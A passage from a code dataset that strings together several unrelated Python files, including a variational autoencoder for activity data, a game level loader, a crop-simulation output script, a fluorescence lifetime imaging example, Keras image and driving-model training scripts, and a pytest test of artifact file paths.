output_shape=(encoding_layer_dim,))([z_mean, z_log_var])\n \n # we instantiate these layers separately so as to reuse them later\n decoder_h1 = Dense(intermediate_dim1, activation='relu')\n decoder_h2 = Dense(intermediate_dim2, activation='relu')\n decoder_mean = Dense(input_shape, activation='sigmoid')\n h_decoded1 = decoder_h1(z)\n h_decoded2 = decoder_h2(h_decoded1) \n x_decoded_mean = decoder_mean(h_decoded2)\n \n # Custom loss layer\n class CustomVariationalLayer(Layer):\n def __init__(self, **kwargs):\n self.is_placeholder = True\n super(CustomVariationalLayer, self).__init__(**kwargs)\n \n def vae_loss(self, x, x_decoded_mean):\n xent_loss = input_shape * metrics.binary_crossentropy(x, x_decoded_mean)\n kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n return K.mean(xent_loss + kl_loss)\n \n def call(self, inputs):\n x = inputs[0]\n x_decoded_mean = inputs[1]\n loss = self.vae_loss(x, x_decoded_mean)\n self.add_loss(loss, inputs=inputs)\n # We won't actually use the output.\n return x\n \n y = CustomVariationalLayer()([x, x_decoded_mean])\n vae = Model(x, y)\n vae.compile(optimizer='rmsprop', loss=None, metrics=['accuracy'])\n \n vae.fit(X, X, \n batch_size=32, \n epochs=400,\n shuffle=True,\n validation_data=(X_test, None))\n \n # build a model to project inputs on the latent space\n encoder = Model(x, z_mean)\n\n return vae, encoder\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\nsc = StandardScaler()\n\nusers = [1,2,3,4,5,6]\nactivities = [\"Jogging\", \"Running\", \"Walking down-stairs\", \"Walking up-stairs\", \"Walking\"]\nfeatures = [\"featuresOrig\", \"featuresFilt\"]\n\nfor feature in features:\n\n for act in activities:\n \n for us in users:\n totalData = pd.read_csv('../../../myTrainingData/' + feature + '_' + act + '#' + str(us) + '.csv');\n totalData.drop([\"user\"], axis=1, inplace=True)\n totalData = sc.fit_transform(np.asarray(totalData, dtype= np.float32));\n \n# =============================================================================\n# UNCOMMENT FOR STATISTICAL+WAVELET/TIME+FFT DATA\n# =============================================================================\n statisticalWaveData = np.concatenate((totalData[:,0:12], totalData[:,18:27], totalData[:, 36:57]), axis=1)\n TimeFFTData = np.concatenate((totalData[:,27:36], totalData[:, 12:18]), axis=1)\n \n x_train_stat_wave, x_test_stat_wave = train_test_split(statisticalWaveData, test_size=0.2)\n x_train_time_fft, x_test_time_fft = train_test_split(TimeFFTData, test_size=0.2)\n \n autoencoder_stat_wave, encoder_stat_wave = variational_autoencoder(15, 25, 35, 42, x_train_stat_wave, x_test_stat_wave);\n \n autoencoder_time_fft, encoder_time_fft = variational_autoencoder(5, 8, 12, 15, x_train_time_fft, x_test_time_fft);\n \n encoded_stats_wave = encoder_stat_wave.predict(statisticalWaveData)\n encoded_time_fft = encoder_time_fft.predict(TimeFFTData)\n \n concat_encoded = np.concatenate((encoded_stats_wave, encoded_time_fft), axis=1)\n \n x_train_fused, x_test_fused = train_test_split(concat_encoded, test_size=0.2)\n \n autoencoder_fused, encoder_fused = variational_autoencoder(7, 11, 16, 20, x_train_fused, x_test_fused);\n \n encoded_fused = encoder_fused.predict(concat_encoded)\n\n np.savetxt(\"./resultsFusedVariational3AEStatWavelet/AEResult_\" + feature + \"_\" + act + '#' + str(us) +\".csv\", encoded_fused, delimiter=',')\n \n# =============================================================================\n# UNCOMMENT FOR STATISTICAL+TIME/FFT+WAVELET DATA \n# =============================================================================\n# \n# statisticalTimeData = np.concatenate((totalData[:,0:12], totalData[:,18:36]), axis=1)\n# fftWaveletData = np.concatenate((totalData[:, 12:18], totalData[:, 36:57]), axis=1)\n# \n# x_train_stat_time, x_test_stat_time = train_test_split(statisticalTimeData, test_size=0.2)\n# x_train_fft_wavelet, x_test_fft_wavelet = train_test_split(fftWaveletData, test_size=0.2)\n# \n# autoencoder_stat_time, encoder_stat_time = variational_autoencoder(10, 16, 24, 30,x_train_stat_time, x_test_stat_time);\n# autoencoder_fft_wavelet, encoder_fft_wavelet = variational_autoencoder(10, 15, 21, 27, x_train_fft_wavelet, x_test_fft_wavelet);\n# \n# encoded_stats_wave = encoder_stat_time.predict(statisticalTimeData)\n# encoded_fft_wavelet = encoder_fft_wavelet.predict(fftWaveletData)\n# \n# concat_encoded = np.concatenate((encoded_stats_wave, encoded_fft_wavelet), axis=1)\n# \n# x_train_fused, x_test_fused = train_test_split(concat_encoded, test_size=0.2)\n# \n# autoencoder_fused, encoder_fused = variational_autoencoder(7, 12, 16, 20, x_train_fused, x_test_fused);\n# encoded_fused = encoder_fused.predict(concat_encoded)\n#\n# np.savetxt(\"./resultsFusedVariational3AEStatTime/AEResult_\" + feature + \"_\" + act + '#' + str(us) +\".csv\", encoded_fused, delimiter=',')\n\n\n# =============================================================================\n# UNCOMMENT FOR STATISTICAL+FFT/TIME+WAVELET DATA \n# =============================================================================\n \n# statisticalFFTData = totalData[:,0:27]\n# TimeWaveletData = totalData[:,27:57]\n# \n# x_train_stat_fft, x_test_stat_fft = train_test_split(statisticalFFTData, test_size=0.2)\n# x_train_time_wavelet, x_test_time_wavelet = train_test_split(TimeWaveletData, test_size=0.2)\n# \n# autoencoder_stat_fft, encoder_stat_fft = variational_autoencoder(10, 15, 21, 27, x_train_stat_fft, x_test_stat_fft);\n# autoencoder_time_wavelet, encoder_time_wavelet = variational_autoencoder(10, 16, 24, 30, x_train_time_wavelet, x_test_time_wavelet);\n# \n# encoded_stats_fft = encoder_stat_fft.predict(statisticalFFTData)\n# encoded_time_wavelet = encoder_time_wavelet.predict(TimeWaveletData)\n# \n# concat_encoded = np.concatenate((encoded_stats_fft, encoded_time_wavelet), axis=1)\n# \n# x_train_fused, x_test_fused = train_test_split(concat_encoded, test_size=0.2)\n# \n# autoencoder_fused, encoder_fused = variational_autoencoder(7, 12, 16, 20, x_train_fused, x_test_fused);\n# encoded_fused = encoder_fused.predict(concat_encoded)\n#\n# np.savetxt(\"./resultsFusedVariational3AEStatFFT/AEResult_\" + feature + \"_\" + act + '#' + str(us) +\".csv\", encoded_fused, delimiter=',')","sub_path":"AEtypes/variational autoencoder/DeepVariational/fusedVariationalDeep3AEs.py","file_name":"fusedVariationalDeep3AEs.py","file_ext":"py","file_size_in_byte":8137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"188202353","text":"import json\n\nfrom common.util import load_file_as_string\n\n\nclass TileInfo:\n def __init__(self, name: str, id_: int, color: tuple):\n super().__init__()\n self.name = name\n self.id = id_\n self.color = color\n\n def __str__(self, *args, **kwargs):\n return str({\n \"name\": self.name,\n \"id\": self.id,\n \"color\": self.color\n })\n\n\nclass Level:\n def __init__(self):\n super().__init__()\n self.meta = {}\n self.tiles = []\n self.info = []\n self.width = 0\n self.height = 0\n\n def load_from_file(self, filename: str):\n contents = load_file_as_string(filename)\n level = json.loads(contents)\n\n # Tiles\n tiles = []\n for e in level[\"tiles\"][\"data\"]:\n tiles.extend(e)\n\n # TileInfo\n info = []\n for e in level[\"tiles\"][\"info\"]:\n info.append(TileInfo(e[\"name\"], e[\"id\"], tuple(e[\"color\"])))\n info[:] = sorted(info, key=lambda e: e.id)\n\n # Width & Height\n height = int(len(level[\"tiles\"][\"data\"]))\n width = int(len(tiles) / height)\n\n if len(tiles) % width:\n raise ValueError(\"Level is not rectangular\")\n\n meta = {}\n for k, v in level[\"meta\"].items():\n if k == \"player_color\":\n meta[k] = (v[0], v[1], v[2])\n if k == \"player_start\":\n meta[k] = (v[0], v[1])\n\n self.meta = level[\"meta\"]\n self.tiles = tiles\n self.info = info\n self.width = width\n self.height = height\n\n def in_bounds(self, x: int, y: int):\n return 0 <= int(x) < int(self.width) and 0 <= int(y) < int(self.height)\n\n def get_tile(self, x: int, y: int, default: TileInfo = None):\n if self.in_bounds(x, y):\n index = int(self.width) * int(y) + int(x)\n tile = self.tiles[index]\n return self.get_tile_by_id(tile)\n else:\n return default\n\n def set_tile_id(self, x: int, y: int, value: int):\n index = int(self.width) * int(y) + int(x)\n\n if 0 <= index < len(self.tiles):\n self.tiles[index] = int(value)\n\n def get_tile_by_id(self, id_: int):\n if 0 <= id_ < len(self.info):\n return self.info[id_]\n\n raise ValueError(\"No tile matches id %s\", id_)\n\n def get_tile_by_name(self, name: str):\n for e in self.info:\n if e.name == name:\n return e\n\n raise ValueError(\"No tile matches name %s\", name)\n\n def get_meta(self, key: str, default):\n value = self.meta.get(key)\n\n if value:\n return value\n else:\n return default\n\n def __str__(self, *args, **kwargs):\n return str({\n \"width\": str(self.width),\n \"height\": str(self.height),\n \"tiles\": str(self.tiles)\n })\n","sub_path":"app/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"320478880","text":"#!/usr/bin/env python3\n\n#scen_interest = ['C_CT_RYE_NF','C_RT_RYE_NPS']\n# data = open(\"CT_NCC_NF_30RH.csv\")\n\n#### Potential Antares / EFC CSV files (ald_fname)\n# 'CT_NCC_NF_00RH'#,'NT_RYE_NPS_30RH'\n #,'CT_NCC_NF_30RH','CT_NCC_NF_45RH','CT_NCC_NF_70RH'\n #,'RT_NCC_NF_00RH','RT_NCC_NF_30RH','RT_NCC_NF_45RH','RT_NCC_NF_70RH'\n #,'NT_NCC_NF_00RH','NT_NCC_NF_30RH','NT_NCC_NF_45RH','NT_NCC_NF_70RH'\n #,'CT_NCC_NPS_00RH','CT_NCC_NPS_30RH','CT_NCC_NPS_45RH','CT_NCC_NPS_70RH'\n #,'RT_NCC_NPS_00RH','RT_NCC_NPS_30RH','RT_NCC_NPS_45RH','RT_NCC_NPS_70RH'\n #,'NT_NCC_NPS_00RH','NT_NCC_NPS_30RH','NT_NCC_NPS_45RH','NT_NCC_NPS_70RH'\n #,'CT_RYE_NF_00RH','CT_RYE_NF_30RH','CT_RYE_NF_45RH','CT_RYE_NF_70RH'\n #,'RT_RYE_NF_00RH','RT_RYE_NF_30RH','RT_RYE_NF_45RH','RT_RYE_NF_70RH'\n #,'NT_RYE_NF_00RH','NT_RYE_NF_30RH','NT_RYE_NF_45RH','NT_RYE_NF_70RH'\n #,'CT_RYE_NPS_00RH','CT_RYE_NPS_30RH','CT_RYE_NPS_45RH','CT_RYE_NPS_70RH'\n #,'RT_RYE_NPS_00RH','RT_RYE_NPS_30RH','RT_RYE_NPS_45RH','RT_RYE_NPS_70RH'\n #,'NT_RYE_NPS_00RH','NT_RYE_NPS_30RH','NT_RYE_NPS_45RH','NT_RYE_NPS_70RH'\n\n#ald_fname = 'PSU_CT_00RH_NCC_NF.csv' # This will create a reference scenario\nald_fname = 'PSU_CT_00RH_NCC_NF.csv'\ndata = open(ald_fname)\nwfile_name = ald_fname[0:-4]+'_cycles.csv'\n\nald_fname = ald_fname.split('_')\nscen = ald_fname[1]+'_'+ald_fname[3]+'_'+ald_fname[4]+'_'+ald_fname[2]\nald_fname = '_'.join(ald_fname)\n\n# create multimode files\nr_type =['C','CS','CCS','S',]\nlenRot =[1,1,2,1]\n\nfirstrun = True\nC = []\nM = []\nS = []\nL = []\nP = []\nA = []\nW = []\nWC= []\nON= []\nTP= []\nB = []\ncrop=[]\nnOut = []\nyOut = []\ndelta_C = []\n\nSOC = [] # delta soil organic carbon\nNO3 = [] # nitrate leached\nVol = [] # volatilized\nN2O = [] # N2O denitrification\n\n#Use -1 to force a crash if index not found\ncc = -1 # cycles id\nmc = -1 # cafo id\nsc = -1 # soil id\nlc = -1 # landuse id\nanc= -1 # animal id\nac = -1 # ammonium id\nonc= -1 # organic nitrogen id\ntpc= -1 # total phosphorus id\nwc = -1 # nldas weather file\nwcc= -1 # nldas code id\nrlen = -1 # rotation length\n\nfor row in data:\n row_copy = row\n row = row.split(',')\n\n if firstrun:\n #print(First!)\n firstrun = False\n for i in range(len(row)):\n #print(Saving vectors)\n if row[i] == 'cluid':\n cc = i\n elif row[i] == 'gnatsgo_ma':\n sc = i\n elif row[i] == 'EFC_ROTATE':\n lc = i\n elif row[i] == 'NLDAS':\n wc = i\n elif row[i] == 'NLDAS_CODE':\n wcc = i\n elif row[i] == 'cafo_major':\n mc = i\n elif row[i] == '_NH3ADJ':\n ac = i\n elif row[i] == '_ONADJ':\n onc = i\n elif row[i] == '_ANIMAAL':\n anc = i\n elif row[i] == '_PADJ':\n tpc = i\n\n else:\n try:\n L.append(row[lc])\n S.append(row[sc])\n C.append(row[cc])\n A.append(float(row[ac]))\n M.append(float(row[mc]))\n B.append(row[anc])\n ON.append(float(row[onc]))\n TP.append(float(row[tpc]))\n W.append(row[wc].strip())\n WC.append(row[wcc].strip())\n except ValueError:\n print(row_copy)\n quit()\n\ndata.close()\nnrow=len(C)\n\nfor i in range(nrow):\n SOC = [] # delta soil organic carbon\n NO3 = [] # nitrate leached\n Vol = [] # volatilized\n N2O = [] # N2O denitrification\n crp = [] # yield\n\n if L[i]== \"CG|CG|CG|CG\":\n crop.append('C')\n rlen = 1\n P.append('1')\n elif L[i] == \"SB|SB|SB|SB\":\n crop.append('S')\n rlen = 1\n P.append('1')\n elif L[i] == \"CG|SB|CG|SB\" or L[i] == \"SB|CG|SB|CG\":\n crop.append('CS')\n rlen = 2\n if L[i] == \"SB|CG|SB|CG\":\n P.append('1')\n else:\n P.append('2')\n elif L[i] == \"SB|CG|CG|SB\" or L[i] == \"CG|CG|SB|CG\" or L[i] == \"CG|SB|CG|CG\" or L[i] == \"SB|CG|CG|CG\":\n crop.append('CCS')\n rlen = 3\n\n if L[i][0:2] == 'SB':\n P.append('1')\n elif L[i][3:5] == 'SB':\n P.append('2')\n elif L[i][6:8] == 'SB':\n P.append('3')\n else: P.append('4')\n else:\n crop.append('CS')\n rlen = 2\n if L[i][0:2] == 'SB':\n P.append('1')\n else: P.append('2')\n\n ctrl_file = 'W'+WC[i]+'_'+crop[i]+P[i]+'_'+S[i]+'_'+scen\n n_path = 'output/'+ctrl_file+'/annualN.dat'\n y_path = 'output/'+ctrl_file+'/season.dat'\n s_path = 'output/'+ctrl_file+'/summary.dat'\n try:\n #print(n_path)\n cycOut = open(n_path)\n nums = []\n for rownum, row in enumerate(cycOut):\n if rownum > 1 and float(row[0:4])>= 2013:\n #print(C[i])\n nums_str = row.split()\n nums = [float(n.strip()) for n in nums_str]\n NO3.append(round(nums[4]+nums[6],3))\n N2O.append(round(nums[11],3))\n Vol.append(round(nums[10],3))\n cycOut.close()\n nOut.append(','+str(NO3)[1:-1]+','+str(N2O)[1:-1]+','+str(Vol)[1:-1])\n\n cycOut = open(y_path)\n crpOld = ''\n yldOld = ''\n yrOld = ''\n Yld = [] # Annual yield\n Crp = [] # Crops harvested each year\n for rownum, row in enumerate(cycOut):\n if rownum > 1 and float(row[0:4])>= 2013:\n row = row.split()\n\n # Harvest may be grain or forage\n if float(row[5]) > 0:\n yld = round(float(row[5]),3)\n else: yld = round(float(row[6]),3)\n\n crp = row[1][0:3]\n # There may be multiple harvests in 1 year\n # If this is not the first harvest of the year:\n if yrOld == row[0][0:4]:\n yld = str(yldOld)+'|'+str(yld)\n crp = crpOld+'|'+crp\n\n # if the last crop isn't the same as this year, AND it's not the first year:\n elif yldOld !='':\n Yld.append(yldOld)\n Crp.append(crpOld)\n\n #elif yldOld !='':\n #pass\n\n #else:\n #Yld.append(yld)\n #Crp.append(crp)\n\n yrOld = row[0][0:4]\n crpOld= crp\n yldOld= yld\n\n # Take care of the last row of data\n Yld.append(yld)\n Crp.append(crp)\n\n cycOut.close()\n yOut.append(','+str(Crp)[1:-1]+','+str(Yld)[1:-1]+',')\n cycOut = open(s_path)\n for rownum,row in enumerate(cycOut):\n if rownum == 2:\n row = row.split()\n # change in soil C over the simulation\n # for default scenario, 1980-2016\n # for alternative scenarios, 2013-2016\n delta_C.append(round(float(row[2]),3))\n cycOut.close()\n\n except FileNotFoundError:\n nOut.append(',NA,NA,NA,NA,NA,NA,NA,NA,NA,NA,NA,NA')\n yOut.append(',NA,NA,NA,NA,NA,NA,NA,NA,')\n delta_C.append('NA')\ndata.close()\n\nfrstrun=True\nnewdata=''\nupdated = ''\nadd0n=' '\nwfile = open(ald_fname)\nfor j,row in enumerate(wfile):\n row = [r.strip() for r in row.split(',')]\n i = j-1\n if frstrun:\n frstrun=False\n updated = \",\".join(row)+str(',NO3_13, NO3_14, NO3_15, NO3_16, N2O_13, N2O_14, N2O_15, N2O_16, Vol_13, Vol_14, Vol_15, Vol_16 \\\n, Crops13, Crops14, Crops15, Crops16, Yield13, Yield14, Yield15, Yield16, soilC_delta \\n')\n else:\n updated = \",\".join(row)+nOut[i]+yOut[i]+str(delta_C[i])+str('\\n')\n\n newdata+=updated\nwfile.close()\ndata2 = open(wfile_name,\"w\")\ndata2.write(newdata)\ndata2.close()\n#########################################################################################\n","sub_path":"scenOutput.py","file_name":"scenOutput.py","file_ext":"py","file_size_in_byte":8093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"276922187","text":"\"\"\"\n====================\nMean lifetime images\n====================\nCompute the mean lifetime in a pixel using the method of moments\n(Irvin Isenberg, 1973, Biophysical journal).\n\"\"\"\nimport tttrlib\nimport numpy as np\nimport pylab as plt\n\nfilename = '../../tttr-data/imaging/zeiss/eGFP_bad_background/eGFP_bad_background.ptu'\nfilename_irf = '../../tttr-data/imaging/zeiss/eGFP_bad_background/IRF.ptu'\n\ndata = tttrlib.TTTR(filename)\nirf = tttrlib.TTTR(filename_irf)\n\nchannels_green = [0, 2]\nchannels_red = [1, 3]\n\n# Assume constant background (same shape as IRF)\ndata_irf = irf[irf.get_selection_by_channel(channels_red)]\nplt.xlim(0, 5000)\nirf_np, x = data_irf.get_microtime_histogram(1)\nbackground = np.ones_like(irf_np)\nplt.semilogy(background)\n\n#%%\n# Create a new CLSM Image. This image will be used as a template for the green and red image.\n# This avoids passing through the TTTR screen multiple times. The frame line, and pixel locations\n# will be copied for the green and red image from this template.\nclsm_template = tttrlib.CLSMImage(data)\nclsm_green = tttrlib.CLSMImage(\n source=clsm_template,\n channels=channels_green\n)\nclsm_red = tttrlib.CLSMImage(\n source=clsm_template,\n channels=channels_red\n)\n\nmean_tau_green = clsm_green.get_mean_lifetime(\n tttr_irf=irf[irf.get_selection_by_channel(channels_green)],\n tttr_data=data,\n minimum_number_of_photons=5,\n background=background,\n background_fraction=0.02,\n stack_frames=True\n)\n\ngreen = clsm_green.intensity.sum(axis=0)\nred = clsm_red.intensity.sum(axis=0)\n\nmask = (green < 20) + (red < 20)\nmasked_green = np.ma.masked_where(mask, green)\nmasked_red = np.ma.masked_where(mask, red)\nmasked_tau = np.ma.masked_where(mask, mean_tau_green.mean(axis=0))\nlg_sg_sr = np.log(masked_green / masked_red)\n\nfig, ax = plt.subplots(nrows=2, ncols=2)\nax[0, 0].set_title('Green intensity')\nax[0, 1].set_title('Red intensity')\nax[1, 0].set_title('Mean green fl. lifetime')\nax[1, 1].set_title('Pixel histogram')\nax[1, 1].set_xlabel('tauG / ns')\nax[1, 1].set_ylabel('log(Sg/Sr')\nax[0, 0].imshow(green, cmap='cividis')\nax[0, 1].imshow(red, cmap='inferno')\nax[1, 0].imshow(mean_tau_green.mean(axis=0), cmap='Spectral')\nax[1, 1].hist2d(\n x=masked_tau.flatten(),\n y=lg_sg_sr.flatten(),\n range=((0.001, 10), (-2, 0.9)),\n bins=41\n)\nplt.show()\n","sub_path":"examples/flim/plot_lifetime_moments_bg.py","file_name":"plot_lifetime_moments_bg.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"257025892","text":"from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nimport numpy as np\nimport glob\nimport pandas as pd\n\n#-------------------------------------------------------------------\n# Directory and image size definition, epoch number and sample size.\n#-------------------------------------------------------------------\n\nimg_width, img_height = 150, 150\ntestdir = './reimager/test/'\ntrain_data_dir = './reimager/train/'\nnb_train_samples = 8000\nnb_epoch = 50\n\n#-------------------------------------------------------------\n# Model Layer I. -- Input shape is defined - 3 layers (R,G,B).\n#-------------------------------------------------------------\n\nmodel = Sequential()\n\nmodel.add(Convolution2D(32, 2, 2, batch_input_shape = (30, 3, 150, 150)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size = (2, 2)))\n\n#-------------------------------\n# Model Layer II. -- Convolution\n#-------------------------------\n\nmodel.add(Convolution2D(32, 3, 3))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size = (2, 2)))\n\n#-------------------------------\n# Model Layer III. -- Convolution \n#-------------------------------\n\nmodel.add(Convolution2D(64, 3, 3))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size = (2, 2)))\n\n#------------------------------------------\n# Model Layer IV. -- Flattened simple layer\n#------------------------------------------\n\nmodel.add(Flatten())\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\n\n\n#-------------------------------------------\n# Model Layer V. -- There are 4 classes.\n#-------------------------------------------\n\nmodel.add(Dropout(0.5))\nmodel.add(Dense(4))\nmodel.add(Activation('softmax'))\n\n\n#---------------------\n# Optimization set up.\n#---------------------\n\nmodel.compile(loss = 'categorical_crossentropy',\n optimizer = 'rmsprop',\n metrics = ['accuracy'])\n\n\n#------------------------------------------------------------------\n# Train data streamer - shear transformation, zooming and flipping.\n#------------------------------------------------------------------\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n vertical_flip = True)\n\n#---------------------\n# Test data generator.\n#---------------------\n\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\n#---------------------\n# Train data streamer.\n#---------------------\n\ntrain_generator = train_datagen.flow_from_directory(train_data_dir,\n target_size = (img_width, img_height),\n batch_size = 30,\n classes = [\"1\", \"2\", \"3\", \"4\"],\n class_mode = \"categorical\")\n\n#-----------------------\n# Model fit initializer.\n#-----------------------\n\nmodel.fit_generator(train_generator,\n samples_per_epoch = nb_train_samples,\n nb_epoch = nb_epoch)\n\n#-----------------\n# Test normalizer.\n#-----------------\n\ntest_real_datagen = ImageDataGenerator(rescale = 1./255)\n\n#--------------------\n# Test data streamer.\n#--------------------\n\ngenerator = test_real_datagen.flow_from_directory(testdir,\n target_size = (150, 150),\n class_mode = None,\n batch_size = 1, \n shuffle = False)\n \n#-------------\n# Predictions.\n#-------------\n\nfiles_to_transform = glob.glob(\"./reimager/test/*.jpg\")\n\nout_list = []\nfor f in files_to_transform:\n image = load_img(f)\n image = img_to_array(image)\n image = np.divide(image, 255)\n image = image.reshape((1,) + image.shape)\n y_hat = model.predict_classes(image, verbose = 1)[0]\n name = f.split(\"./reimager/test/\")[1].split(\".jpg\")[0]\n row_content = [name, y_hat]\n out_list = out_list + [row_content]\n \ndf = pd.DataFrame(out_list) \n\ndf.to_csv(path_or_buf = \"prediction_neuro_classes.csv\", sep = \";\", index = False)\n","sub_path":"CNN_Cross_Validation_Streamer.py","file_name":"CNN_Cross_Validation_Streamer.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"13537566","text":"import os\nimport yaml\n \nclass ModanConf: \n def __init__(self):\n file_path1 = os.path.join('..','config','modan.yaml')\n file_path2 = os.path.join('.','config','modan.yaml')\n file_path = ''\n if( os.access(file_path1, os.F_OK) ): file_path = file_path1\n elif( os.access(file_path2, os.F_OK) ): file_path = file_path2\n #print file_path\n self.item = {}\n\n try:\n self.item = yaml.load( file(file_path,'r') ) \n except:\n print( \"Error to open yaml files under config\")\n","sub_path":"libpy/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"141452573","text":"\"\"\"Some simple test to confirm the artifact path is correctly set\n\"\"\"\nimport logging\nimport os\n\nfrom copy import deepcopy\nfrom typing import NamedTuple\nfrom typing import Union\nfrom unittest.mock import patch\nfrom unittest.mock import mock_open\n\nimport pytest\n\nfrom ansible_navigator.configuration_subsystem import NavigatorConfiguration\nfrom ansible_navigator.actions.run import Action as action\n\n\nclass TstData(NamedTuple):\n \"\"\"the test data object\"\"\"\n\n name: str\n filename: Union[None, str]\n playbook: str\n expected: str\n\n\ndef id_from_data(value):\n \"\"\"return the name from the test data object\"\"\"\n return f\" {value.name} \"\n\n\ntest_data = [\n TstData(\"Filename absolute\", \"/tmp/artifact.json\", \"site.yml\", \"/tmp/artifact.json\"),\n TstData(\n \"Filename with .\", \"./artifact.json\", \"site.yml\", f\"{os.path.abspath('.')}/artifact.json\"\n ),\n TstData(\n \"Filename with ..\", \"../artifact.json\", \"site.yml\", f\"{os.path.abspath('..')}/artifact.json\"\n ),\n TstData(\n \"Filename with ~\", \"~/artifact.json\", \"/tmp/site.yaml\", \"/home/test_user/artifact.json\"\n ),\n TstData(\"Playbook absolute\", None, \"/tmp/site.yaml\", \"/tmp/site-artifact\"),\n TstData(\"Playbook with .\", None, \"./site.yaml\", f\"{os.path.abspath('.')}/site-artifact\"),\n TstData(\"Playbook with ..\", None, \"../site.yaml\", f\"{os.path.abspath('..')}/site-artifact\"),\n TstData(\"Playbook with ~\", None, \"~/site.yaml\", \"/home/test_user/site-artifact\"),\n]\n\n\n@patch.dict(\"os.environ\", {\"HOME\": \"/home/test_user\"})\n@patch(\"os.makedirs\", return_value=True)\n@patch(\"builtins.open\", new_callable=mock_open)\n@patch(\"ansible_navigator.actions.run.Action._get_status\", return_value=(0, 0))\n@pytest.mark.parametrize(\"data\", test_data, ids=id_from_data)\ndef test_artifact_path(_mocked_get_status, mocked_open, _mocked_makedirs, caplog, data):\n \"\"\"Test the building of the artifact filename given a filename or playbook\"\"\"\n caplog.set_level(logging.DEBUG)\n\n args = deepcopy(NavigatorConfiguration)\n args.entry(\"playbook\").value.current = data.playbook\n args.post_processor.playbook(entry=args.entry(\"playbook\"), config=args)\n playbook_artifact_save_as = args.entry(\"playbook_artifact_save_as\")\n if data.filename:\n args.entry(\"playbook_artifact_save_as\").value.current = data.filename\n else:\n args.entry(\n \"playbook_artifact_save_as\"\n ).value.current = playbook_artifact_save_as.value.default\n args.entry(\"playbook_artifact_enable\").value.current = True\n\n run = action(args=args)\n run.write_artifact(filename=data.filename)\n\n open_filename = mocked_open.call_args[0][0]\n assert open_filename.startswith(data.expected), caplog.text\n","sub_path":"tests/unit/test_playbook_artifact_path.py","file_name":"test_playbook_artifact_path.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"353444563","text":"import csv\nimport cv2\nimport math\nimport numpy as np\n\n\ndef read_samples_from_csv(data_dir, samples):\n csv_file = data_dir + '/driving_log.csv' \n with open(csv_file) as csvfile:\n reader = csv.reader(csvfile)\n for sample in reader:\n for i in range(0,3):\n sample[i] = data_dir + '/IMG/' + sample[i].strip().split('/')[-1]\n samples.append(sample)\n\nfrom sklearn.utils import shuffle\nimport os.path\nimport random\nHIGHER_ANGLE_THRESHOLD = 0.25\nHIGHER_ANGLE_PROBABILITY = 0.5\n\"\"\"\nReturn (image_path, angle) with sub-sampling.\n\"\"\"\ndef get_one_sample(sample):\n should_get_higher_angle = random.uniform(0, 1) <= HIGHER_ANGLE_PROBABILITY\n for i in range(0, 3):\n steering_bias = 0.0\n if i == 1:\n steering_bias = 0.25\n elif i == 2:\n steering_bias = -0.25\n\n image_path = sample[i]\n angle = steering_bias + float(sample[3])\n if should_get_higher_angle and abs(angle) < HIGHER_ANGLE_THRESHOLD:\n continue\n return (image_path, angle)\n\n\n \ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n angles = []\n for sample in batch_samples:\n if not os.path.exists(sample[0]):\n print('Image: {} does not exist.'.format(sample[0]))\n continue\n\n image_path, angle = get_one_sample(sample)\n image = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB)\n images.append(image)\n angles.append(angle)\n\n # Flip Image\n image_flipped = np.fliplr(image)\n angle_flipped = - angle\n images.append(image_flipped)\n angles.append(angle_flipped)\n\n X_train = np.array(images)\n y_train = np.array(angles)\n yield shuffle(X_train, y_train)\n\n#---------------------------------------\n# Generate Training, Validation and \n# Testing data.\n#--------------------------------------\ntrack1_dir = 'data/track1'\nreversed_track1_dir = 'data/track1_reversed'\nudacity_dir = 'data/udacity'\n\nsamples = []\n\nread_samples_from_csv(track1_dir, samples)\nread_samples_from_csv(reversed_track1_dir, samples)\nread_samples_from_csv(udacity_dir, samples)\n\n\nfrom sklearn.model_selection import train_test_split\ntrain_samples, test_samples = train_test_split(samples, test_size=0.1)\ntrain_samples, validation_samples = train_test_split(train_samples, test_size=0.2)\nprint('Training sample size: 2 x {}'.format(len(train_samples)))\nprint('Validation sample size: 2 x {}'.format(len(validation_samples)))\nprint('Testing sample size: 2 x {}'.format(len(test_samples)))\n\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\ntest_generator = generator(test_samples, batch_size=32)\n\n#-----------------------------------------\n# Model Definition\n#-----------------------------------------\nimport keras\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Conv2D, Lambda, Dropout, Activation, 